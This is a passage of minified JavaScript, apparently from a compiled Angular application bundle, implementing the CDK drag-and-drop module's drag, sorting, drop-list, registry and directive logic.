te=c.style;this._rootElementTapHighlight=te.webkitTapHighlightColor||"",te.webkitTapHighlightColor="transparent"}this._hasStartedDragging=this._hasMoved=!1,this._removeSubscriptions(),this._initialClientRect=this._rootElement.getBoundingClientRect(),this._pointerMoveSubscription=this._dragDropRegistry.pointerMove.subscribe(this._pointerMove),this._pointerUpSubscription=this._dragDropRegistry.pointerUp.subscribe(this._pointerUp),this._scrollSubscription=this._dragDropRegistry.scrolled(this._getShadowRoot()).subscribe(te=>this._updateOnScroll(te)),this._boundaryElement&&(this._boundaryRect=Fw(this._boundaryElement));const q=this._previewTemplate;this._pickupPositionInElement=q&&q.template&&!q.matchSize?{x:0,y:0}:this._getPointerPositionInElement(this._initialClientRect,a,e);const Y=this._pickupPositionOnPage=this._lastKnownPointerPosition=this._getPointerPositionOnPage(e);this._pointerDirectionDelta={x:0,y:0},this._pointerPositionAtLastDirectionChange={x:Y.x,y:Y.y},this._dragStartTime=Date.now(),this._dragDropRegistry.startDragging(this,e)}_cleanupDragArtifacts(a){Kz(this._rootElement,!0,Bw),this._anchor.parentNode.replaceChild(this._rootElement,this._anchor),this._destroyPreview(),this._destroyPlaceholder(),this._initialClientRect=this._boundaryRect=this._previewRect=this._initialTransform=void 0,this._ngZone.run(()=>{const e=this._dropContainer,i=e.getItemIndex(this),n=this._getPointerPositionOnPage(a),r=this._getDragDistance(n),c=e._isOverContainer(n.x,n.y);this.ended.next({source:this,distance:r,dropPoint:n,event:a}),this.dropped.next({item:this,currentIndex:i,previousIndex:this._initialIndex,container:e,previousContainer:this._initialContainer,isPointerOverContainer:c,distance:r,dropPoint:n,event:a}),e.drop(this,i,this._initialIndex,this._initialContainer,c,r,n,a),this._dropContainer=this._initialContainer})}_updateActiveDropContainer({x:a,y:e},{x:i,y:n}){let r=this._initialContainer._getSiblingContainerFromPosition(this,a,e);!r&&this._dropContainer!==this._initialContainer&&this._initialContainer._isOverContainer(a,e)&&(r=this._initialContainer),r&&r!==this._dropContainer&&this._ngZone.run(()=>{this.exited.next({item:this,container:this._dropContainer}),this._dropContainer.exit(this),this._dropContainer=r,this._dropContainer.enter(this,a,e,r===this._initialContainer&&r.sortingDisabled?this._initialIndex:void 0),this.entered.next({item:this,container:r,currentIndex:r.getItemIndex(this)})}),this.isDragging()&&(this._dropContainer._startScrollingIfNecessary(i,n),this._dropContainer._sortItem(this,a,e,this._pointerDirectionDelta),this.constrainPosition?this._applyPreviewTransform(a,e):this._applyPreviewTransform(a-this._pickupPositionInElement.x,e-this._pickupPositionInElement.y))}_createPreviewElement(){const a=this._previewTemplate,e=this.previewClass,i=a?a.template:null;let n;if(i&&a){const r=a.matchSize?this._initialClientRect:null,c=a.viewContainer.createEmbeddedView(i,a.context);c.detectChanges(),n=oW(c,this._document),this._previewRef=c,a.matchSize?rW(n,r):n.style.transform=U3(this._pickupPositionOnPage.x,this._pickupPositionOnPage.y)}else n=Zz(this._rootElement),rW(n,this._initialClientRect),this._initialTransform&&(n.style.transform=this._initialTransform);return zw(n.style,{"pointer-events":"none",margin:"0",position:"fixed",top:"0",left:"0","z-index":`${this._config.zIndex||1e3}`},Bw),W1(n,!1),n.classList.add("cdk-drag-preview"),n.setAttribute("dir",this._direction),e&&(Array.isArray(e)?e.forEach(r=>n.classList.add(r)):n.classList.add(e)),n}_animatePreviewToPlaceholder(){if(!this._hasMoved)return Promise.resolve();const a=this._placeholder.getBoundingClientRect();this._preview.classList.add("cdk-drag-animating"),this._applyPreviewTransform(a.left,a.top);const e=function mpe(t){const a=getComputedStyle(t),e=Ww(a,"transition-property"),i=e.find(d=>"transform"===d||"all"===d);if(!i)return 0;const n=e.indexOf(i),r=Ww(a,"transition-duration"),c=Ww(a,"transition-delay");return Xz(r[n])+Xz(c[n])}(this._preview);return 0===e?Promise.resolve():this._ngZone.runOutsideAngular(()=>new Promise(i=>{const n=c=>{var d;(!c||Id(c)===this._preview&&"transform"===c.propertyName)&&(null===(d=this._preview)||void 0===d||d.removeEventListener("transitionend",n),i(),clearTimeout(r))},r=setTimeout(n,1.5*e);this._preview.addEventListener("transitionend",n)}))}_createPlaceholderElement(){const a=this._placeholderTemplate,e=a?a.template:null;let i;return e?(this._placeholderRef=a.viewContainer.createEmbeddedView(e,a.context),this._placeholderRef.detectChanges(),i=oW(this._placeholderRef,this._document)):i=Zz(this._rootElement),i.style.pointerEvents="none",i.classList.add("cdk-drag-placeholder"),i}_getPointerPositionInElement(a,e,i){const n=e===this._rootElement?null:e,r=n?n.getBoundingClientRect():a,c=Jy(i)?i.targetTouches[0]:i,d=this._getViewportScrollPosition();return{x:r.left-a.left+(c.pageX-r.left-d.left),y:r.top-a.top+(c.pageY-r.top-d.top)}}_getPointerPositionOnPage(a){const e=this._getViewportScrollPosition(),i=Jy(a)?a.touches[0]||a.changedTouches[0]||{pageX:0,pageY:0}:a,n=i.pageX-e.left,r=i.pageY-e.top;if(this._ownerSVGElement){const c=this._ownerSVGElement.getScreenCTM();if(c){const d=this._ownerSVGElement.createSVGPoint();return d.x=n,d.y=r,d.matrixTransform(c.inverse())}}return{x:n,y:r}}_getConstrainedPointerPosition(a){const e=this._dropContainer?this._dropContainer.lockAxis:null;let{x:i,y:n}=this.constrainPosition?this.constrainPosition(a,this,this._initialClientRect,this._pickupPositionInElement):a;if("x"===this.lockAxis||"x"===e?n=this._pickupPositionOnPage.y:("y"===this.lockAxis||"y"===e)&&(i=this._pickupPositionOnPage.x),this._boundaryRect){const{x:r,y:c}=this._pickupPositionInElement,d=this._boundaryRect,{width:T,height:k}=this._getPreviewRect(),q=d.top+c,Y=d.bottom-(k-c);i=nW(i,d.left+r,d.right-(T-r)),n=nW(n,q,Y)}return{x:i,y:n}}_updatePointerDirectionDelta(a){const{x:e,y:i}=a,n=this._pointerDirectionDelta,r=this._pointerPositionAtLastDirectionChange,c=Math.abs(e-r.x),d=Math.abs(i-r.y);return c>this._config.pointerDirectionChangeThreshold&&(n.x=e>r.x?1:-1,r.x=e),d>this._config.pointerDirectionChangeThreshold&&(n.y=i>r.y?1:-1,r.y=i),n}_toggleNativeDragInteractions(){if(!this._rootElement||!this._handles)return;const a=this._handles.length>0||!this.isDragging();a!==this._nativeInteractionsEnabled&&(this._nativeInteractionsEnabled=a,W1(this._rootElement,a))}_removeRootElementListeners(a){a.removeEventListener("mousedown",this._pointerDown,H3),a.removeEventListener("touchstart",this._pointerDown,aW),a.removeEventListener("dragstart",this._nativeDragStart,H3)}_applyRootElementTransform(a,e){const i=U3(a,e),n=this._rootElement.style;null==this._initialTransform&&(this._initialTransform=n.transform&&"none"!=n.transform?n.transform:""),n.transform=B3(i,this._initialTransform)}_applyPreviewTransform(a,e){var i;const n=null!==(i=this._previewTemplate)&&void 0!==i&&i.template?void 0:this._initialTransform,r=U3(a,e);this._preview.style.transform=B3(r,n)}_getDragDistance(a){const e=this._pickupPositionOnPage;return e?{x:a.x-e.x,y:a.y-e.y}:{x:0,y:0}}_cleanupCachedDimensions(){this._boundaryRect=this._previewRect=void 0,this._parentPositions.clear()}_containInsideBoundaryOnResize(){let{x:a,y:e}=this._passiveTransform;if(0===a&&0===e||this.isDragging()||!this._boundaryElement)return;const i=this._rootElement.getBoundingClientRect(),n=this._boundaryElement.getBoundingClientRect();if(0===n.width&&0===n.height||0===i.width&&0===i.height)return;const r=n.left-i.left,c=i.right-n.right,d=n.top-i.top,T=i.bottom-n.bottom;n.width>i.width?(r>0&&(a+=r),c>0&&(a-=c)):a=0,n.height>i.height?(d>0&&(e+=d),T>0&&(e-=T)):e=0,(a!==this._passiveTransform.x||e!==this._passiveTransform.y)&&this.setFreeDragPosition({y:e,x:a})}_getDragStartDelay(a){const e=this.dragStartDelay;return"number"==typeof e?e:Jy(a)?e.touch:e?e.mouse:0}_updateOnScroll(a){const e=this._parentPositions.handleScroll(a);if(e){const i=Id(a);this._boundaryRect&&i!==this._boundaryElement&&i.contains(this._boundaryElement)&&Yy(this._boundaryRect,e.top,e.left),this._pickupPositionOnPage.x+=e.left,this._pickupPositionOnPage.y+=e.top,this._dropContainer||(this._activeTransform.x-=e.left,this._activeTransform.y-=e.top,this._applyRootElementTransform(this._activeTransform.x,this._activeTransform.y))}}_getViewportScrollPosition(){var a;return(null===(a=this._parentPositions.positions.get(this._document))||void 0===a?void 0:a.scrollPosition)||this._parentPositions.getViewportScrollPosition()}_getShadowRoot(){return void 0===this._cachedShadowRoot&&(this._cachedShadowRoot=_3(this._rootElement)),this._cachedShadowRoot}_getPreviewInsertionPoint(a,e){const i=this._previewContainer||"global";if("parent"===i)return a;if("global"===i){const n=this._document;return e||n.fullscreenElement||n.webkitFullscreenElement||n.mozFullScreenElement||n.msFullscreenElement||n.body}return Gr(i)}_getPreviewRect(){return(!this._previewRect||!this._previewRect.width&&!this._previewRect.height)&&(this._previewRect=this._preview?this._preview.getBoundingClientRect():this._initialClientRect),this._previewRect}_getTargetHandle(a){return this._handles.find(e=>a.target&&(a.target===e||e.contains(a.target)))}}function U3(t,a){return`translate3d(${Math.round(t)}px, ${Math.round(a)}px, 0)`}function nW(t,a,e){return Math.max(a,Math.min(e,t))}function Jy(t){return"t"===t.type[0]}function oW(t,a){const e=t.rootNodes;if(1===e.length&&e[0].nodeType===a.ELEMENT_NODE)return e[0];const i=a.createElement("div");return e.forEach(n=>i.appendChild(n)),i}function rW(t,a){t.style.width=`${a.width}px`,t.style.height=`${a.height}px`,t.style.transform=U3(a.left,a.top)}function Qs(t,a,e){const i=Zy(a,t.length-1),n=Zy(e,t.length-1);if(i===n)return;const r=t[i],c=n<i?-1:1;for(let d=i;d!==n;d+=c)t[d]=t[d+c];t[n]=r}function Zy(t,a){return Math.max(0,Math.min(a,t))}class ppe{constructor(a,e){this._element=a,this._dragDropRegistry=e,this._itemPositions=[],this.orientation="vertical",this._previousSwap={drag:null,delta:0,overlaps:!1}}start(a){this.withItems(a)}sort(a,e,i,n){const r=this._itemPositions,c=this._getItemIndexFromPointerPosition(a,e,i,n);if(-1===c&&r.length>0)return null;const d="horizontal"===this.orientation,T=r.findIndex(Ne=>Ne.drag===a),k=r[c],Y=k.clientRect,te=T>c?1:-1,pe=this._getItemOffsetPx(r[T].clientRect,Y,te),Re=this._getSiblingOffsetPx(T,r,te),Fe=r.slice();return Qs(r,T,c),r.forEach((Ne,et)=>{if(Fe[et]===Ne)return;const ut=Ne.drag===a,Ze=ut?pe:Re,yt=ut?a.getPlaceholderElement():Ne.drag.getRootElement();Ne.offset+=Ze,d?(yt.style.transform=B3(`translate3d(${Math.round(Ne.offset)}px, 0, 0)`,Ne.initialTransform),Yy(Ne.clientRect,0,Ze)):(yt.style.transform=B3(`translate3d(0, ${Math.round(Ne.offset)}px, 0)`,Ne.initialTransform),Yy(Ne.clientRect,Ze,0))}),this._previousSwap.overlaps=Vw(Y,e,i),this._previousSwap.drag=k.drag,this._previousSwap.delta=d?n.x:n.y,{previousIndex:T,currentIndex:c}}enter(a,e,i,n){const r=null==n||n<0?this._getItemIndexFromPointerPosition(a,e,i):n,c=this._activeDraggables,d=c.indexOf(a),T=a.getPlaceholderElement();let k=c[r];if(k===a&&(k=c[r+1]),!k&&(null==r||-1===r||r<c.length-1)&&this._shouldEnterAsFirstChild(e,i)&&(k=c[0]),d>-1&&c.splice(d,1),k&&!this._dragDropRegistry.isDragging(k)){const q=k.getRootElement();q.parentElement.insertBefore(T,q),c.splice(r,0,a)}else Gr(this._element).appendChild(T),c.push(a);T.style.transform="",this._cacheItemPositions()}withItems(a){this._activeDraggables=a.slice(),this._cacheItemPositions()}withSortPredicate(a){this._sortPredicate=a}reset(){this._activeDraggables.forEach(a=>{var e;const i=a.getRootElement();if(i){const n=null===(e=this._itemPositions.find(r=>r.drag===a))||void 0===e?void 0:e.initialTransform;i.style.transform=n||""}}),this._itemPositions=[],this._activeDraggables=[],this._previousSwap.drag=null,this._previousSwap.delta=0,this._previousSwap.overlaps=!1}getActiveItemsSnapshot(){return this._activeDraggables}getItemIndex(a){return("horizontal"===this.orientation&&"rtl"===this.direction?this._itemPositions.slice().reverse():this._itemPositions).findIndex(i=>i.drag===a)}updateOnScroll(a,e){this._itemPositions.forEach(({clientRect:i})=>{Yy(i,a,e)}),this._itemPositions.forEach(({drag:i})=>{this._dragDropRegistry.isDragging(i)&&i._sortFromLastPointerPosition()})}_cacheItemPositions(){const a="horizontal"===this.orientation;this._itemPositions=this._activeDraggables.map(e=>{const i=e.getVisibleElement();return{drag:e,offset:0,initialTransform:i.style.transform||"",clientRect:Fw(i)}}).sort((e,i)=>a?e.clientRect.left-i.clientRect.left:e.clientRect.top-i.clientRect.top)}_getItemOffsetPx(a,e,i){const n="horizontal"===this.orientation;let r=n?e.left-a.left:e.top-a.top;return-1===i&&(r+=n?e.width-a.width:e.height-a.height),r}_getSiblingOffsetPx(a,e,i){const n="horizontal"===this.orientation,r=e[a].clientRect,c=e[a+-1*i];let d=r[n?"width":"height"]*i;if(c){const T=n?"left":"top",k=n?"right":"bottom";-1===i?d-=c.clientRect[T]-r[k]:d+=r[T]-c.clientRect[k]}return d}_shouldEnterAsFirstChild(a,e){if(!this._activeDraggables.length)return!1;const i=this._itemPositions,n="horizontal"===this.orientation;if(i[0].drag!==this._activeDraggables[0]){const c=i[i.length-1].clientRect;return n?a>=c.right:e>=c.bottom}{const c=i[0].clientRect;return n?a<=c.left:e<=c.top}}_getItemIndexFromPointerPosition(a,e,i,n){const r="horizontal"===this.orientation,c=this._itemPositions.findIndex(({drag:d,clientRect:T})=>{if(d===a)return!1;if(n){const k=r?n.x:n.y;if(d===this._previousSwap.drag&&this._previousSwap.overlaps&&k===this._previousSwap.delta)return!1}return r?e>=Math.floor(T.left)&&e<Math.floor(T.right):i>=Math.floor(T.top)&&i<Math.floor(T.bottom)});return-1!==c&&this._sortPredicate(c,a)?c:-1}}class _pe{constructor(a,e,i,n,r){this._dragDropRegistry=e,this._ngZone=n,this._viewportRuler=r,this.disabled=!1,this.sortingDisabled=!1,this.autoScrollDisabled=!1,this.autoScrollStep=2,this.enterPredicate=()=>!0,this.sortPredicate=()=>!0,this.beforeStarted=new J,this.entered=new J,this.exited=new J,this.dropped=new J,this.sorted=new J,this._isDragging=!1,this._draggables=[],this._siblings=[],this._activeSiblings=new Set,this._viewportScrollSubscription=I.EMPTY,this._verticalScrollDirection=0,this._horizontalScrollDirection=0,this._stopScrollTimers=new J,this._cachedShadowRoot=null,this._startScrollInterval=()=>{this._stopScrolling(),$z(0,Az).pipe(ea(this._stopScrollTimers)).subscribe(()=>{const c=this._scrollNode,d=this.autoScrollStep;1===this._verticalScrollDirection?c.scrollBy(0,-d):2===this._verticalScrollDirection&&c.scrollBy(0,d),1===this._horizontalScrollDirection?c.scrollBy(-d,0):2===this._horizontalScrollDirection&&c.scrollBy(d,0)})},this.element=Gr(a),this._document=i,this.withScrollableParents([this.element]),e.registerDropContainer(this),this._parentPositions=new Jz(i),this._sortStrategy=new ppe(this.element,e),this._sortStrategy.withSortPredicate((c,d)=>this.sortPredicate(c,d,this))}dispose(){this._stopScrolling(),this._stopScrollTimers.complete(),this._viewportScrollSubscription.unsubscribe(),this.beforeStarted.complete(),this.entered.complete(),this.exited.complete(),this.dropped.complete(),this.sorted.complete(),this._activeSiblings.clear(),this._scrollNode=null,this._parentPositions.clear(),this._dragDropRegistry.removeDropContainer(this)}isDragging(){return this._isDragging}start(){this._draggingStarted(),this._notifyReceivingSiblings()}enter(a,e,i,n){this._draggingStarted(),null==n&&this.sortingDisabled&&(n=this._draggables.indexOf(a)),this._sortStrategy.enter(a,e,i,n),this._cacheParentPositions(),this._notifyReceivingSiblings(),this.entered.next({item:a,container:this,currentIndex:this.getItemIndex(a)})}exit(a){this._reset(),this.exited.next({item:a,container:this})}drop(a,e,i,n,r,c,d,T={}){this._reset(),this.dropped.next({item:a,currentIndex:e,previousIndex:i,container:this,previousContainer:n,isPointerOverContainer:r,distance:c,dropPoint:d,event:T})}withItems(a){const e=this._draggables;return this._draggables=a,a.forEach(i=>i._withDropContainer(this)),this.isDragging()&&(e.filter(n=>n.isDragging()).every(n=>-1===a.indexOf(n))?this._reset():this._sortStrategy.withItems(this._draggables)),this}withDirection(a){return this._sortStrategy.direction=a,this}connectedTo(a){return this._siblings=a.slice(),this}withOrientation(a){return this._sortStrategy.orientation=a,this}withScrollableParents(a){const e=Gr(this.element);return this._scrollableElements=-1===a.indexOf(e)?[e,...a]:a.slice(),this}getScrollableParents(){return this._scrollableElements}getItemIndex(a){return this._isDragging?this._sortStrategy.getItemIndex(a):this._draggables.indexOf(a)}isReceiving(){return this._activeSiblings.size>0}_sortItem(a,e,i,n){if(this.sortingDisabled||!this._clientRect||!Yz(this._clientRect,.05,e,i))return;const r=this._sortStrategy.sort(a,e,i,n);r&&this.sorted.next({previousIndex:r.previousIndex,currentIndex:r.currentIndex,container:this,item:a})}_startScrollingIfNecessary(a,e){if(this.autoScrollDisabled)return;let i,n=0,r=0;if(this._parentPositions.positions.forEach((c,d)=>{d===this._document||!c.clientRect||i||Yz(c.clientRect,.05,a,e)&&([n,r]=function gpe(t,a,e,i){const n=lW(a,i),r=dW(a,e);let c=0,d=0;if(n){const T=t.scrollTop;1===n?T>0&&(c=1):t.scrollHeight-T>t.clientHeight&&(c=2)}if(r){const T=t.scrollLeft;1===r?T>0&&(d=1):t.scrollWidth-T>t.clientWidth&&(d=2)}return[c,d]}(d,c.clientRect,a,e),(n||r)&&(i=d))}),!n&&!r){const{width:c,height:d}=this._viewportRuler.getViewportSize(),T={width:c,height:d,top:0,right:c,bottom:d,left:0};n=lW(T,e),r=dW(T,a),i=window}i&&(n!==this._verticalScrollDirection||r!==this._horizontalScrollDirection||i!==this._scrollNode)&&(this._verticalScrollDirection=n,this._horizontalScrollDirection=r,this._scrollNode=i,(n||r)&&i?this._ngZone.runOutsideAngular(this._startScrollInterval):this._stopScrolling())}_stopScrolling(){this._stopScrollTimers.next()}_draggingStarted(){const a=Gr(this.element).style;this.beforeStarted.next(),this._isDragging=!0,this._initialScrollSnap=a.msScrollSnapType||a.scrollSnapType||"",a.scrollSnapType=a.msScrollSnapType="none",this._sortStrategy.start(this._draggables),this._cacheParentPositions(),this._viewportScrollSubscription.unsubscribe(),this._listenToScrollEvents()}_cacheParentPositions(){const a=Gr(this.element);this._parentPositions.cache(this._scrollableElements),this._clientRect=this._parentPositions.positions.get(a).clientRect}_reset(){this._isDragging=!1;const a=Gr(this.element).style;a.scrollSnapType=a.msScrollSnapType=this._initialScrollSnap,this._siblings.forEach(e=>e._stopReceiving(this)),this._sortStrategy.reset(),this._stopScrolling(),this._viewportScrollSubscription.unsubscribe(),this._parentPositions.clear()}_isOverContainer(a,e){return null!=this._clientRect&&Vw(this._clientRect,a,e)}_getSiblingContainerFromPosition(a,e,i){return this._siblings.find(n=>n._canReceive(a,e,i))}_canReceive(a,e,i){if(!this._clientRect||!Vw(this._clientRect,e,i)||!this.enterPredicate(a,this))return!1;const n=this._getShadowRoot().elementFromPoint(e,i);if(!n)return!1;const r=Gr(this.element);return n===r||r.contains(n)}_startReceiving(a,e){const i=this._activeSiblings;!i.has(a)&&e.every(n=>this.enterPredicate(n,this)||this._draggables.indexOf(n)>-1)&&(i.add(a),this._cacheParentPositions(),this._listenToScrollEvents())}_stopReceiving(a){this._activeSiblings.delete(a),this._viewportScrollSubscription.unsubscribe()}_listenToScrollEvents(){this._viewportScrollSubscription=this._dragDropRegistry.scrolled(this._getShadowRoot()).subscribe(a=>{if(this.isDragging()){const e=this._parentPositions.handleScroll(a);e&&this._sortStrategy.updateOnScroll(e.top,e.left)}else this.isReceiving()&&this._cacheParentPositions()})}_getShadowRoot(){if(!this._cachedShadowRoot){const a=_3(Gr(this.element));this._cachedShadowRoot=a||this._document}return this._cachedShadowRoot}_notifyReceivingSiblings(){const a=this._sortStrategy.getActiveItemsSnapshot().filter(e=>e.isDragging());this._siblings.forEach(e=>e._startReceiving(this,a))}}function lW(t,a){const{top:e,bottom:i,height:n}=t,r=.05*n;return a>=e-r&&a<=e+r?1:a>=i-r&&a<=i+r?2:0}function dW(t,a){const{left:e,right:i,width:n}=t,r=.05*n;return a>=e-r&&a<=e+r?1:a>=i-r&&a<=i+r?2:0}const q3=ym({passive:!1,capture:!0});let Cpe=(()=>{class t{constructor(e,i){this._ngZone=e,this._dropInstances=new Set,this._dragInstances=new Set,this._activeDragInstances=[],this._globalListeners=new Map,this._draggingPredicate=n=>n.isDragging(),this.pointerMove=new J,this.pointerUp=new J,this.scroll=new J,this._preventDefaultWhileDragging=n=>{this._activeDragInstances.length>0&&n.preventDefault()},this._persistentTouchmoveListener=n=>{this._activeDragInstances.length>0&&(this._activeDragInstances.some(this._draggingPredicate)&&n.preventDefault(),this.pointerMove.next(n))},this._document=i}registerDropContainer(e){this._dropInstances.has(e)||this._dropInstances.add(e)}registerDragItem(e){this._dragInstances.add(e),1===this._dragInstances.size&&this._ngZone.runOutsideAngular(()=>{this._document.addEventListener("touchmove",this._persistentTouchmoveListener,q3)})}removeDropContainer(e){this._dropInstances.delete(e)}removeDragItem(e){this._dragInstances.delete(e),this.stopDragging(e),0===this._dragInstances.size&&this._document.removeEventListener("touchmove",this._persistentTouchmoveListener,q3)}startDragging(e,i){if(!(this._activeDragInstances.indexOf(e)>-1)&&(this._activeDragInstances.push(e),1===this._activeDragInstances.length)){const n=i.type.startsWith("touch");this._globalListeners.set(n?"touchend":"mouseup",{handler:r=>this.pointerUp.next(r),options:!0}).set("scroll",{handler:r=>this.scroll.next(r),options:!0}).set("selectstart",{handler:this._preventDefaultWhileDragging,options:q3}),n||this._globalListeners.set("mousemove",{handler:r=>this.pointerMove.next(r),options:q3}),this._ngZone.runOutsideAngular(()=>{this._globalListeners.forEach((r,c)=>{this._document.addEventListener(c,r.handler,r.options)})})}}stopDragging(e){const i=this._activeDragInstances.indexOf(e);i>-1&&(this._activeDragInstances.splice(i,1),0===this._activeDragInstances.length&&this._clearGlobalListeners())}isDragging(e){return this._activeDragInstances.indexOf(e)>-1}scrolled(e){const i=[this.scroll];return e&&e!==this._document&&i.push(new G(n=>this._ngZone.runOutsideAngular(()=>{const c=d=>{this._activeDragInstances.length&&n.next(d)};return e.addEventListener("scroll",c,!0),()=>{e.removeEventListener("scroll",c,!0)}}))),ra(...i)}ngOnDestroy(){this._dragInstances.forEach(e=>this.removeDragItem(e)),this._dropInstances.forEach(e=>this.removeDropContainer(e)),this._clearGlobalListeners(),this.pointerMove.complete(),this.pointerUp.complete()}_clearGlobalListeners(){this._globalListeners.forEach((e,i)=>{this._document.removeEventListener(i,e.handler,e.options)}),this._globalListeners.clear()}}return t.\u0275fac=function(e){return new(e||t)(At(qi),At(ga))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();const ype={dragStartThreshold:5,pointerDirectionChangeThreshold:5};let Hw=(()=>{class t{constructor(e,i,n,r){this._document=e,this._ngZone=i,this._viewportRuler=n,this._dragDropRegistry=r}createDrag(e,i=ype){return new fpe(e,i,this._document,this._ngZone,this._viewportRuler,this._dragDropRegistry)}createDropList(e){return new _pe(e,this._dragDropRegistry,this._document,this._ngZone,this._viewportRuler)}}return t.\u0275fac=function(e){return new(e||t)(At(ga),At(qi),At(bm),At(Cpe))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();const mW=new ni("CDK_DRAG_PARENT"),uW=new ni("CdkDropListGroup"),hW=new ni("CDK_DRAG_CONFIG");let bpe=0;const fW=new ni("CdkDropList");let Sd=(()=>{class t{constructor(e,i,n,r,c,d,T){this.element=e,this._changeDetectorRef=n,this._scrollDispatcher=r,this._dir=c,this._group=d,this._destroyed=new J,this.connectedTo=[],this.id="cdk-drop-list-"+bpe++,this.enterPredicate=()=>!0,this.sortPredicate=()=>!0,this.dropped=new Tt,this.entered=new Tt,this.exited=new Tt,this.sorted=new Tt,this._unsortedItems=new Set,this._dropListRef=i.createDropList(e),this._dropListRef.data=this,T&&this._assignDefaults(T),this._dropListRef.enterPredicate=(k,q)=>this.enterPredicate(k.data,q.data),this._dropListRef.sortPredicate=(k,q,Y)=>this.sortPredicate(k,q.data,Y.data),this._setupInputSyncSubscription(this._dropListRef),this._handleEvents(this._dropListRef),t._dropLists.push(this),d&&d._items.add(this)}get disabled(){return this._disabled||!!this._group&&this._group.disabled}set disabled(e){this._dropListRef.disabled=this._disabled=wi(e)}addItem(e){this._unsortedItems.add(e),this._dropListRef.isDragging()&&this._syncItemsWithRef()}removeItem(e){this._unsortedItems.delete(e),this._dropListRef.isDragging()&&this._syncItemsWithRef()}getSortedItems(){return Array.from(this._unsortedItems).sort((e,i)=>e._dragRef.getVisibleElement().compareDocumentPosition(i._dragRef.getVisibleElement())&Node.DOCUMENT_POSITION_FOLLOWING?-1:1)}ngOnDestroy(){const e=t._dropLists.indexOf(this);e>-1&&t._dropLists.splice(e,1),this._group&&this._group._items.delete(this),this._unsortedItems.clear(),this._dropListRef.dispose(),this._destroyed.next(),this._destroyed.complete()}_setupInputSyncSubscription(e){this._dir&&this._dir.change.pipe(Ro(this._dir.value),ea(this._destroyed)).subscribe(i=>e.withDirection(i)),e.beforeStarted.subscribe(()=>{const i=Oy(this.connectedTo).map(n=>"string"==typeof n?t._dropLists.find(c=>c.id===n):n);if(this._group&&this._group._items.forEach(n=>{-1===i.indexOf(n)&&i.push(n)}),!this._scrollableParentsResolved){const n=this._scrollDispatcher.getAncestorScrollContainers(this.element).map(r=>r.getElementRef().nativeElement);this._dropListRef.withScrollableParents(n),this._scrollableParentsResolved=!0}e.disabled=this.disabled,e.lockAxis=this.lockAxis,e.sortingDisabled=wi(this.sortingDisabled),e.autoScrollDisabled=wi(this.autoScrollDisabled),e.autoScrollStep=Uo(this.autoScrollStep,2),e.connectedTo(i.filter(n=>n&&n!==this).map(n=>n._dropListRef)).withOrientation(this.orientation)})}_handleEvents(e){e.beforeStarted.subscribe(()=>{this._syncItemsWithRef(),this._changeDetectorRef.markForCheck()}),e.entered.subscribe(i=>{this.entered.emit({container:this,item:i.item.data,currentIndex:i.currentIndex})}),e.exited.subscribe(i=>{this.exited.emit({container:this,item:i.item.data}),this._changeDetectorRef.markForCheck()}),e.sorted.subscribe(i=>{this.sorted.emit({previousIndex:i.previousIndex,currentIndex:i.currentIndex,container:this,item:i.item.data})}),e.dropped.subscribe(i=>{this.dropped.emit({previousIndex:i.previousIndex,currentIndex:i.currentIndex,previousContainer:i.previousContainer.data,container:i.container.data,item:i.item.data,isPointerOverContainer:i.isPointerOverContainer,distance:i.distance,dropPoint:i.dropPoint,event:i.event}),this._changeDetectorRef.markForCheck()})}_assignDefaults(e){const{lockAxis:i,draggingDisabled:n,sortingDisabled:r,listAutoScrollDisabled:c,listOrientation:d}=e;this.disabled=null!=n&&n,this.sortingDisabled=null!=r&&r,this.autoScrollDisabled=null!=c&&c,this.orientation=d||"vertical",i&&(this.lockAxis=i)}_syncItemsWithRef(){this._dropListRef.withItems(this.getSortedItems().map(e=>e._dragRef))}}return t._dropLists=[],t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(Hw),Ee(Ma),Ee(By),Ee(Cr,8),Ee(uW,12),Ee(hW,8))},t.\u0275dir=Ot({type:t,selectors:[["","cdkDropList",""],["cdk-drop-list"]],hostAttrs:[1,"cdk-drop-list"],hostVars:7,hostBindings:function(e,i){2&e&&(Rt("id",i.id),Ct("cdk-drop-list-disabled",i.disabled)("cdk-drop-list-dragging",i._dropListRef.isDragging())("cdk-drop-list-receiving",i._dropListRef.isReceiving()))},inputs:{connectedTo:["cdkDropListConnectedTo","connectedTo"],data:["cdkDropListData","data"],orientation:["cdkDropListOrientation","orientation"],id:"id",lockAxis:["cdkDropListLockAxis","lockAxis"],disabled:["cdkDropListDisabled","disabled"],sortingDisabled:["cdkDropListSortingDisabled","sortingDisabled"],enterPredicate:["cdkDropListEnterPredicate","enterPredicate"],sortPredicate:["cdkDropListSortPredicate","sortPredicate"],autoScrollDisabled:["cdkDropListAutoScrollDisabled","autoScrollDisabled"],autoScrollStep:["cdkDropListAutoScrollStep","autoScrollStep"]},outputs:{dropped:"cdkDropListDropped",entered:"cdkDropListEntered",exited:"cdkDropListExited",sorted:"cdkDropListSorted"},exportAs:["cdkDropList"],features:[ki([{provide:uW,useValue:void 0},{provide:fW,useExisting:t}])]}),t})();const pW=new ni("CdkDragHandle"),Mpe=new ni("CdkDragPlaceholder"),vpe=new ni("CdkDragPreview");let kd=(()=>{class t{constructor(e,i,n,r,c,d,T,k,q,Y,te){this.element=e,this.dropContainer=i,this._ngZone=r,this._viewContainerRef=c,this._dir=T,this._changeDetectorRef=q,this._selfHandle=Y,this._parentDrag=te,this._destroyed=new J,this.started=new Tt,this.released=new Tt,this.ended=new Tt,this.entered=new Tt,this.exited=new Tt,this.dropped=new Tt,this.moved=new G(pe=>{const Re=this._dragRef.moved.pipe(Xe(Fe=>({source:this,pointerPosition:Fe.pointerPosition,event:Fe.event,delta:Fe.delta,distance:Fe.distance}))).subscribe(pe);return()=>{Re.unsubscribe()}}),this._dragRef=k.createDrag(e,{dragStartThreshold:d&&null!=d.dragStartThreshold?d.dragStartThreshold:5,pointerDirectionChangeThreshold:d&&null!=d.pointerDirectionChangeThreshold?d.pointerDirectionChangeThreshold:5,zIndex:null==d?void 0:d.zIndex}),this._dragRef.data=this,t._dragInstances.push(this),d&&this._assignDefaults(d),i&&(this._dragRef._withDropContainer(i._dropListRef),i.addItem(this)),this._syncInputs(this._dragRef),this._handleEvents(this._dragRef)}get disabled(){return this._disabled||this.dropContainer&&this.dropContainer.disabled}set disabled(e){this._disabled=wi(e),this._dragRef.disabled=this._disabled}getPlaceholderElement(){return 